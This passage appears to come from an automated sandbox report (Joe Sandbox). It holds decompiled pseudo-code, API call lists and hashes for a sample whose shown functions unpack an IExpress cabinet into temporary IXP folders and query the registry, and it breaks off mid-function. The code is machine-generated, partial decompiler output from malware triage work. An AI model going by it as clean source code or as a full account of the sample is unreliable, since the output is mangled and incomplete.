                                                                                                                                                                                                                                              0x00a85b98
                                                                                                                                                                                                                                              0x00a85b9e
                                                                                                                                                                                                                                              0x00a85b87
                                                                                                                                                                                                                                              0x00a85b8f
                                                                                                                                                                                                                                              0x00a85b8f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b85
                                                                                                                                                                                                                                              0x00a85b29
                                                                                                                                                                                                                                              0x00a85b33
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b35
                                                                                                                                                                                                                                              0x00a85b48
                                                                                                                                                                                                                                              0x00a85b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b4a
                                                                                                                                                                                                                                              0x00a85b0f
                                                                                                                                                                                                                                              0x00a85b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85b16
                                                                                                                                                                                                                                              0x00a85a7c
                                                                                                                                                                                                                                              0x00a85a8a
                                                                                                                                                                                                                                              0x00a85aa5
                                                                                                                                                                                                                                              0x00a85aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a859bb
                                                                                                                                                                                                                                              0x00a859c0
                                                                                                                                                                                                                                              0x00a859c7
                                                                                                                                                                                                                                              0x00a859d1
                                                                                                                                                                                                                                              0x00a859d6
                                                                                                                                                                                                                                              0x00a85c05
                                                                                                                                                                                                                                              0x00a85c14
                                                                                                                                                                                                                                              0x00a85c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A859A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A859AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A85A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 00A85A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A85A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A85A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A85A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A85AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A85BFC
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: 8c6ed638ac91d78e97197e2be8876ab74b856d41cf50f599b4c9bc35e4678c82
                                                                                                                                                                                                                                              • Instruction ID: 8d80def161900bf2638d48e9e9f617413607801fd74af1f1065c2eae483bcdaa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c6ed638ac91d78e97197e2be8876ab74b856d41cf50f599b4c9bc35e4678c82
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B7195B1D0020C9FEB15EBA4CC89BFB77BCEB58344F5441AAF90596140EA349E458B21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 374 a84fe0-a8501a call a8468f FindResourceA LoadResource LockResource 377 a85020-a85027 374->377 378 a85161-a85163 374->378 379 a85029-a85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 a85057-a8505e call a84efd 377->380 379->380 383 a8507c-a850b4 380->383 384 a85060-a85077 call a844b9 380->384 389 a850e8-a85104 call a844b9 383->389 390 a850b6-a850da 383->390 388 a85107-a8510e 384->388 391 a8511d-a8511f 388->391 392 a85110-a85117 FreeResource 388->392 398 a85106 389->398 390->398 402 a850dc 390->402 395 a8513a-a85141 391->395 396 a85121-a85127 391->396 392->391 400 a8515f 395->400 401 a85143-a8514a 395->401 396->395 399 a85129-a85135 call a844b9 396->399 398->388 399->395 400->378 401->400 404 a8514c-a85159 SendMessageA 401->404 405 a850e3-a850e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00A84FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
	 *0xa89144 = E00A8468F(_t36, 0, 0);
	_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
	 *0xa89140 = _t8;
	if(_t8 == 0) {
		return _t8;
	}
	_t9 =  *0xa88584; // 0x0
	if(_t9 != 0) {
		ShowWindow(GetDlgItem(_t9, 0x842), 0);
		ShowWindow(GetDlgItem( *0xa88584, 0x841), 5); // executed
	}
	_t10 = E00A84EFD(0, 0); // executed
	if(_t10 != 0) {
		__imp__#20(E00A84CA0, E00A84CC0, E00A84980, E00A84A50, E00A84AD0, E00A84B60, E00A84BC0, 1, 0xa89148, _t33);
		_t34 = _t10;
		if(_t34 == 0) {
			L8:
			_t29 =  *0xa89148; // 0x0
			_t24 =  *0xa88584; // 0x0
			E00A844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
			_t37 = 0;
			L9:
			goto L10;
		}
		__imp__#22(_t34, "*MEMCAB", 0xa81140, 0, E00A84CD0, 0, 0xa89140); // executed
		_t37 = _t10;
		if(_t37 == 0) {
			goto L9;
		}
		__imp__#23(_t34); // executed
		if(_t10 != 0) {
			goto L9;
		}
		goto L8;
	} else {
		_t27 =  *0xa88584; // 0x0
		E00A844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
		_t37 = 0;
		L10:
		_t12 =  *0xa89140; // 0x0
		if(_t12 != 0) {
			FreeResource(_t12);
			 *0xa89140 = 0;
		}
		if(_t37 == 0) {
			_t47 =  *0xa891d8; // 0x0
			if(_t47 == 0) {
				E00A844B9(0, 0x4f8, 0, 0, 0x10, 0);
			}
		}
		if(( *0xa88a38 & 0x00000001) == 0 && ( *0xa89a34 & 0x00000001) == 0) {
			SendMessageA( *0xa88584, 0xfa1, _t37, 0);
		}
		return _t37;
	}
}

















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A84FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00A85006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00A8500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 00A85030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00A85037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 00A8504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00A85051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A85111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A85159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: f11bcdcee71ff671ea1dc0eca6f079209b51ac316e6b4b1334fd2ccf60b22397
                                                                                                                                                                                                                                              • Instruction ID: c9b6356bb702ce2c9d9c1c0235dad055bd13899198c35f70ef210362da579c0f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f11bcdcee71ff671ea1dc0eca6f079209b51ac316e6b4b1334fd2ccf60b22397
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631C9B0B807027BE720FBE1AD8DF6736ADB718B55F040615FD06A62A1EA788C028751
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A853A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E00A8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E00A81680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E00A8658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E00A86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0xa88a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A853FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-7194216
                                                                                                                                                                                                                                              • Opcode ID: fa17b3ca04740a1f312de62643eb90a60d7daa2c4780aeafbca706363e5eec6f
                                                                                                                                                                                                                                              • Instruction ID: 729168984b7d11c71c6acb9c9fd986cee06475f4184e4bd3f5c0301c7c88fbbf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa17b3ca04740a1f312de62643eb90a60d7daa2c4780aeafbca706363e5eec6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0911C171B0060467E320FB769D49FEF766EEBD5711F00012AFA46D6290DE78898387A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 478 a85467-a85484 479 a8548a-a85490 call a853a1 478->479 480 a8551c-a85528 call a81680 478->480 483 a85495-a85497 479->483 484 a8552d-a85539 call a858c8 480->484 485 a8549d-a854c0 call a81781 483->485 486 a85581-a85583 483->486 493 a8553b-a85545 CreateDirectoryA 484->493 494 a8554d-a85552 484->494 495 a8550c-a8551a call a8658a 485->495 496 a854c2-a854d8 GetSystemInfo 485->496 489 a8558d-a8559d call a86ce0 486->489 498 a85577-a8557c call a86285 493->498 499 a85547 493->499 500 a85554-a85557 call a8597d 494->500 501 a85585-a8558b 494->501 495->484 504 a854da-a854dd 496->504 505 a854fe 496->505 498->486 499->494 511 a8555c-a8555e 500->511 501->489 509 a854df-a854e2 504->509 510 a854f7-a854fc 504->510 512 a85503-a85507 call a8658a 505->512 514 a854f0-a854f5 509->514 515 a854e4-a854e7 509->515 510->512 511->501 516 a85560-a85566 511->516 512->495 514->512 515->495 518 a854e9-a854ee 515->518 516->486 517 a85568-a85575 RemoveDirectoryA 516->517 517->486 518->512
                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0xa891e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00A81680(0xa891e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E00A858C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E00A86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E00A8597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0xa88a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa88a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E00A853A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0xa891e4;
                                                                                                                                                                                                                                              				E00A81781(0xa891e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0xa89a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00A8658A(_t48, 0x104, 0xa81140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E00A8658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}


                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A854C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8556F
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A853FB
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85402
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8541F
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8542B
                                                                                                                                                                                                                                                • Part of subcall function 00A853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-3696344869
                                                                                                                                                                                                                                              • Opcode ID: 8e1d30d12470103a2f380cd32555af2a3a903f06d6b10086e1dd55f5ffb421de
                                                                                                                                                                                                                                              • Instruction ID: 02ad73c3f5eba09d5f9cea8c29de5014575fac06151407ebfd5ab260e1813bc9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e1d30d12470103a2f380cd32555af2a3a903f06d6b10086e1dd55f5ffb421de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3631D171F00A046BDB18BBB99D4897FB6AFEB81740B18016AAC0286590DF748E128795
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 519 a8256d-a8257d 520 a82622-a82627 call a824e0 519->520 521 a82583-a82589 519->521 528 a82629-a8262f 520->528 523 a825e8-a82607 RegOpenKeyExA 521->523 524 a8258b 521->524 525 a82609-a82620 RegQueryInfoKeyA 523->525 526 a825e3-a825e6 523->526 524->528 529 a82591-a82595 524->529 530 a825d1-a825dd RegCloseKey 525->530 526->528 529->528 531 a8259b-a825ba RegOpenKeyExA 529->531 530->526 531->526 532 a825bc-a825cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A8256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
